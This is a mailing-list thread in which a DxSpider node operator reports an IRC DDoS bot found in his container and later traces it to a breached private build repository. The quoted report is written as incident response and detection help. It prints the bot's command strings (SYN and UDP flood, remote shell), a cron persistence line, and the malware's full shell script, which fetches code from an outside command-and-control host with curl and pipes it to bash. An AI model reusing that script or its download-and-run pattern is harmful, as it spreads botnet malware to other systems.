[Dxspider-support] Fwd: UPDATE: Suspicious traffic in my container - Scanbot
Patrick Skerrett
patrick at skerrett.net
Sat Sep 6 18:46:28 BST 2025
FYI- I tracked it down. Sorry for the alarm.
---------- Forwarded message ---------
From: Patrick Skerrett <patrick at skerrett.net>
Date: Sat, Sep 6, 2025 at 12:45 PM
Subject: UPDATE: Suspicious traffic in my container - Scanbot
To: <sysops at dxcluster.info>
I believe I tracked the source of this down..
The docker container build code that I use is stored on a private github
repo. It looks like the repo itself was breached, and the malicious code
was inserted into the build process itself.
So when we built & re-deployed the dxspider container the other day, the
container was built with the IRC bot inserted into the build process
itself. So the IRC launcher started up with the container.
That explains why the code was running as sysop, and it got into a private
container without any other external access...
I am NOT using a public repo for the build, so anyone using a public Docker
container for Dxspider is likely fine... This was a breach of my private
code repository.
I think we are OK, and sorry for the alarm, but it doesn't hurt to check
anyway for anomalous processes...
73,
Pat S.
On Sat, Sep 6, 2025 at 10:42 AM Patrick Skerrett <patrick at skerrett.net>
wrote:
> I run DxSpider as a docker container on my swarm cluster. I had a ping
> this morning from my IDS router that there was some command & control
> traffic to IRC coming from the node that runs DxSpider.
>
> In looking, I found what looks like a DDOS bot deployed on my node, as the
> user 'sysop' (that the DXSpider user runs under).
>
> *************
> Considering the DXSpider server runs in an isolated container and the
> suspicious files were written as the 'sysop' owner, I think I have to
> conclude there is a vulnerability in the DxSpider software that allowed
> this payload to be deployed!!
> *********
>
> Here is the relevant info:
>
> Payload was written to "/var/tmp/.. / " That is dot dot space
>
> Obfuscated directory name to make it hard to navigate to.
>
> The process itself is a compiled application called '-bash'
>
> Trying to view it in a hex editor, I discovered these strings:
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(http|tcp|connect|socket|bot|scan)" | head -10
> NOTICE %s :Unable to create socket.
> http://
> NOTICE %s :Unable to connect to http.
> NOTICE %s :GET <http address> <save as> = Downloads a
> file off the web and saves it onto the hd
> [32m botnet
> [36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp
> pass
> [37m bot nick is required e.g
> [37m bot ident is required e.g
> [37m bot realname is required e.g
> Not a socket
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
> MODE %s +xi
> JOIN %s :%s
> PONG %s
> JOIN %s
> MODE %s +o %s
> PRIVMSG
> PING
> JOIN
> DT_JOINABLE
> _PRIVMSG
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i
> "NOTICE"
> NOTICE %s :Unable to comply.
> NOTICE %s :GET <host> <save as>
> NOTICE %s :Unable to create socket.
> NOTICE %s :Unable to resolve address.
> NOTICE %s :Unable to connect to http.
> NOTICE %s :Receiving file.
> NOTICE %s :Saved as %s
> NOTICE %s :Spoofs: %d.%d.%d.%d
> NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
> NOTICE %s :Bot by anonymous
> NOTICE %s :NICK <nick>
> NOTICE %s :Nick cannot be larger than 9 characters.
> NOTICE %s :DISABLE <pass>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs> = Special
> packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs> = An advanced
> syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> NOTICE %s :UNKNOWN <target> <secs> = Another
> non-spoof udp flooder
> NOTICE %s :NICK <nick> = Changes the
> nick of the client
> NOTICE %s :SERVER <server> = Changes
> servers
> NOTICE %s :GETSPOOFS = Gets the
> current spoofing
> NOTICE %s :SPOOFS <subnet> = Changes
> spoofing to a subnet
> NOTICE %s :DISABLE = Disables all
> packeting from this client
> NOTICE %s :ENABLE = Enables all
> packeting from this client
> NOTICE %s :KILL = Kills the
> client
> NOTICE %s :GET <http address> <save as> = Downloads a
> file off the web and saves it onto the hd
> NOTICE %s :VERSION = Requests
> version of client
> NOTICE %s :KILLALL = Kills all
> current packeting
> NOTICE %s :HELP = Displays this
> NOTICE %s :IRC <command> = Sends this
> command to the server
> NOTICE %s :SH <command> = Executes a
> command
> NOTICE %s :Killing pid %d.
> NOTICE %s :%s
>
>
>
>
> This is obviously bad stuff..
>
>
> **** HOW TO DETECT IF THIS IS ON YOUR NODE****
>
> As sudo:
> ps -ef |grep ScanBot
> sysop 1990 1 0 09:40 ? 00:00:00 ScanBot
>
> # ls -l "/var/tmp/.. /"
> total 5340
> -rw-r----- 1 sysop sysop 72770 Sep 6 09:39 block.lst
> drwxr-xr-x 2 sysop sysop 4096 Apr 3 02:55 bot
> -rwxr-xr-x 1 sysop sysop 855 Feb 12 2023 clear
> -rwxr-xr-x 1 sysop sysop 3272064 Oct 12 2023 curl
> drwxr-xr-x 2 sysop sysop 4096 Sep 6 09:31 pass_files
> -rwxr-xr-x 1 sysop sysop 2094872 Jul 13 2024 rm
> -rwxr-xr-x 1 sysop sysop 499 Sep 6 09:29 scanbot
> -rw-r--r-- 1 sysop sysop 0 Sep 6 10:35 scanbot.lst
> drwxr-xr-x 2 sysop sysop 4096 Dec 7 2023 screen
>
> It created a crontab entry for the sysop user:
> /var/spool/cron/crontabs/sysop
> root at node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
> # DO NOT EDIT THIS FILE - edit the master and reinstall.
> # (- installed on Sat Sep 6 09:29:49 2025)
> # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
> * * * * * "/var/tmp/.. "/scanbot
>
> runs every minute and tries to re-download itself:
>
> #!/bin/bash
>
> cd "/var/tmp/.. "
> shopt -s expand_aliases
> alias curl="./curl"
> type="randomscan"
> host="cc.systemctl.cc"
> api="scanbot.sh"
> brute_type="spirit"
> pubnick="sysop at 98.46.184.64"
> privnick="sysop at 98.46.143.4"
> scanbot()
> {
> url="$1"
> if [ ! -z "$url" ]; then
> url="url = \"$url\""
> curl -K - << EOF
> ipv4
> fail
> silent
> connect-timeout = 60
> max-time = 120
> retry = 2
> $url
> EOF
> sync
> fi
> }
> scanbot
> $host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick
> | bash
>
>
>
>
>
>
>
> ************
> Please check to see if anyone is running this process, if so, we may have
> a vulnerability that would allow the DXSpider cluster to become a DDOS C&C
> vector!!!
> ********
>
>
>
>
>
>
>
>
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://mailman.tobit.co.uk/pipermail/dxspider-support/attachments/20250906/f807214c/attachment.htm>
More information about the Dxspider-support
mailing list